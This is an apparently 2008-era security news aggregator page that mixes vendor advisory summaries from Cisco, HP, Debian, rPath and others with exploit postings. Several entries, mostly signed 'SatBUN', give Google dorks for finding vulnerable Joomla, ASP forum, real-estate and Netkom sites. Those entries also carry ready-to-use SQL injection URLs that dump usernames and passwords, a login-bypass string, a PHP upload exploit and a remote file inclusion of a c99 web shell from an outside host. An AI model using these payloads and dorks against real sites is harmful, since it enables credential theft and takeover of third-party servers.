rPSA-2008-0063-1 boost

 ( 646 days 18 hours ago)

rPath Security Advisory: 2008-0063-1 Published: 2008-02-13 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect Deterministic Denial of Service Updated Versions: boost=conary.rpath.comatrpl:1/1.33.1-1.1-1 rPath Issue Tracking System: References: Description: Previous versions of the boost package are vulnerable to multiple ...

Cisco Security Advisory: Cisco Unified IP Phone Overflow and Denial of Service Vulnerabilities

 ( 646 days 18 hours ago)

Cisco Security Advisory: Cisco Unified IP Phone Overflow and Denial of Service Vulnerabilities Revision 1.0 For Public Release 2008 February 13 1600 UTC (GMT) Summary Cisco Unified IP Phone models contain multiple overflow and denial of ...

Cisco Security Advisory: SQL injection in Cisco Unified Communications Manager

 ( 646 days 18 hours ago)

Cisco Security Advisory: SQL injection in Cisco Unified Communications Manager Document ID: 100358 Advisory ID: cisco-sa-20080213-cucmsql Revision 1.0 For Public Release 2008 February 13 1600 UTC (GMT) - Summary Cisco Unified Communications Manager is vulnerable to a SQL Injection ...

joomla "com_omnirealestate" S@L Injection

 ( 646 days 18 hours ago)

# # AUTHOR : SatBUN # # HOME : # dork 2= allinurl: "comomnirealestate" index.php?option=comomnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mosusers/*&results=SatBUN

joomla "com_model"

 ( 646 days 18 hours ago)

# # AUTHOR : SatBUN # # HOME : # DorK 1 : allinurl: "commodel" EXPLOIT : index.php?option=commodel&Itemid=0&task=pipa&act=2&objid=-9999/**/union/**/select/**/username,password/**/from/**/mosusers/*

FBI warns of Valentine's Day 'Storm'

 ( 646 days 21 hours ago)

Beware those romantic sounding e-mails you may be getting ahead of Valentine's Day. According to the FBI, they could be this year's version of the Storm Trojan horse.

joomla upload php code or picture (com_uhp)

 ( 646 days 22 hours ago)

# # joomla upload php code or picture (comuhp) # # # AUTHOR : SatBUN # # HOME : # # DorK 1 : allinurl:"index.php?option=comuhp" # # DORK 2 : allinurl:"component/option,comuhp" # # EXPLOIT : # # index.php?option=comuhp&task=upload&id=SatBUN # # and upload php code or upload your picture # ...

all forums.asp hack

 ( 646 days 22 hours ago)

this exploit have 500.000 site admin # # forums.asp hack (content.asp?contenttype) SQL Injection # # # AUTHOR : SatBUN # # HOME : # # # # DORKS 2 : allinurl: "content.asp?contenttype" # # EXPLOIT 1: forums.asp?keywords=SatBUN&dosearch=1&sortby=users.usernameUNIONSELECT1,2,3,4,5,username,password,8,9,10,11,12,13,14FROMUsers EXPLOIT 2: forums.asp?keywords=SatBUN&dosearch=1&sortby= users.usernameUNIONSELECT1,2,3,4,5,username,password,8,9,10,11,12,13,14,15FROMUsers # SatBUN www.hackturkiye.com SatBUN ...

ALL VERSİON PHPAUTOVİDEO c99 shell

 ( 646 days 22 hours ago)

# # ALL VERSİON PHPAUTOVİDEO # # # AUTHOR : SatBUN # # HOME : # # DorKs 1 : "powered by phpAutoVideo" # # DORKS 2 : Copyright © 2007 Agares Media # # DORKS 3 : allinurl: "playvideo.php?video" # # EXPLOIT : # # wwww.xxxxxx.com/admin/frontpageright.php?loadadminpage=http:xxxxx.c99.txt? # ...

Provided By Development Solutions SQL Injection Exploit(panel)

 ( 646 days 22 hours ago)

# Provided By Development Solutions SQL Injection Exploit(panel) # # Real Estate SQL Injection Exploit(panel) # # AUTHOR : SatBUN # # HOME : # DorKs 1 : "Provided By Development Solutions" # # dork 2 : allinurl: "agentlist.asp?Letter" # EXPLOIT : # # Username: anything' OR 'x'='x # ...

[security bulletin] HPSBUX02313 SSRT080015 rev.1 - HP-UX Running Apache, Remote Execution of Arbitrary Code

 ( 646 days 22 hours ago)

SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01364714 Version: 1 HPSBUX02313 SSRT080015 rev.1 - HP-UX Running Apache, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2008-02-11 Last Updated: 2008-02-11 ...

[security bulletin] HPSBMA02274 SSRT071445 rev.3 - HP System Management Homepage (SMH) for HP-UX, Remote Cross Site Scripting (XSS)

 ( 646 days 22 hours ago)

SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01183265 Version: 3 HPSBMA02274 SSRT071445 rev.3 - HP System Management Homepage (SMH) for HP-UX, Remote Cross Site Scripting (XSS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2007-10-03 ...

rPSA-2008-0061-1 SDL_image

 ( 646 days 22 hours ago)

rPath Security Advisory: 2008-0061-1 Published: 2008-02-13 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: SDLimage=conary.rpath.comatrpl:1/1.2.4-3.2-1 rPath Issue Tracking System: References: Description: Previous versions of the SDLimage package are vulnerable to multiple ...

[security bulletin] HPSBUX02249 SSRT071442 rev.3 - HP-UX Running the Ignite-UX or the DynRootDisk (DRD) get_system_info Command, Local Unqualified Configuration Change

 ( 646 days 22 hours ago)

SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01118367 Version: 3 HPSBUX02249 SSRT071442 rev.3 - HP-UX Running the Ignite-UX or the DynRootDisk (DRD) getsysteminfo Command, Local Unqualified Configuration Change NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. ...

Netkom Internet Solutions (folder_id) Remote SQL Injection Vulnerability

 ( 646 days 22 hours ago)

Title : Netkom Internet Solutions (folderid) Remote SQL Injection Vulnerability Author : By CratzyKing crazykinqathotmail.co.uk Greetz : Str0ke,CrackersChild,TheBekir,Eno7,Sabotaqe,Jani zary,GencTurk and Ayyildiz Team Users Dork : Powered by Netkom Internet Solutions Exploit : /doccenterdirectorylistings.php?folderid= SQL : -99unionselect1,2,concat(username,0x3a,password) ,4fromuserslimit0,1/* ...

rPSA-2008-0054-1 tk

 ( 646 days 22 hours ago)

rPath Security Advisory: 2008-0054-1 Published: 2008-02-12 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: tk=conary.rpath.comatrpl:1/8.4.10-5.3-1 rPath Issue Tracking System: References: Description: Previous versions of the tk package are vulnerable to an Arbitrary Code ...

[Reversemode Advisory] February Advisories : Microsoft Word 2003 + Fortinet Forticlient

 ( 646 days 22 hours ago)

Hi 1.Microsoft Word Memory Corruption Vulnerability Microsoft Word 2003 is prone to a memory corruption vulnerability while parsing a specially crafted Word file. The vulnerability is caused by calculation errors while parsing certain fields within the barely documented, File Information Block (FIB). ...

Vwar New Bug

 ( 646 days 22 hours ago)

Vendor : Www.Vwar.De Credits : PouyaServer Vuln. Ver : v1.5.0 Pouya.S3rveratGmail.Com [ >>> ] [ >>> ] [ >>> ] [ >>> ]

Re: XSS on Obedit v3.03

 ( 646 days 22 hours ago)

A new version of obedit (v3.04b) has been posted to my website which resolves the XSS issue described in BugTraq 25703. Richard Podsada

iDefense Security Advisory 02.12.08: Adobe Flash Media Server 2 Memory Corruption Vulnerability

 ( 646 days 22 hours ago)

iDefense Security Advisory 02.12.08 Feb 12, 2008 I. BACKGROUND Adobe Flash Media Server is an application server for Flash based applications. It provides an environment to run interactive media applications, as well as audio and video streaming functionality. More ...

[SECURITY] [DSA 1494-2] New linux-2.6 packages fix privilege escalation

 ( 646 days 22 hours ago)

- Debian Security Advisory DSA-1494-2 securityatdebian.org Florian Weimer, dann frazier February 12, 2008 - Package : linux-2.6 Vulnerability : missing access checks Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-0010 CVE-2008-0163 CVE-2008-0600 The vmsplice system call did not properly verify address arguments ...

Mandriva: Updated mandriva-kde-config packages fix loss of

 ( 646 days 22 hours ago)

LinuxSecurity.com: The KDE panel has a clock applet which includes de hability to change its appearance and behavior. Because of a configuration problem, this applet was not properly saving these changes were not properly saved, being lost at every user login. This update fixes the problem.

Mandriva: Updated desktop-common-data package fixes menus,

 ( 646 days 22 hours ago)

LinuxSecurity.com: In Mandriva Linux 2008.0 some utilities were not correctly displayed in Tools menu (such as Yakuake), and settings:// was not working properly in KDE konqueror. This update fixes the problems.

Debian: New linux-2.6 packages fix privilege escalation

 ( 646 days 22 hours ago)

LinuxSecurity.com: The vmsplice system call did not properly verify address arguments passed by user space processes, which allowed local attackers to overwrite arbitrary kernel memory, gaining root privileges

Slackware: kernel exploit fix

 ( 646 days 22 hours ago)

LinuxSecurity.com: New kernel packages are available for Slackware 12.0, and -current to fix a local root exploit. More details about this issue may be found in the Common Vulnerabilities and Exposures (CVE) database: [ >>> ] [ >>> ] [ >>> ]

Debian: New mplayer packages fix arbitrary code execution

 ( 646 days 22 hours ago)

LinuxSecurity.com: Several buffer overflows have been discovered in the MPlayer movie player, which might lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems:

Debian: New nagios-plugins packages fix several

 ( 646 days 22 hours ago)

LinuxSecurity.com: A buffer overflow has been discovered in the parser for HTTP Location headers (present in the check_http module).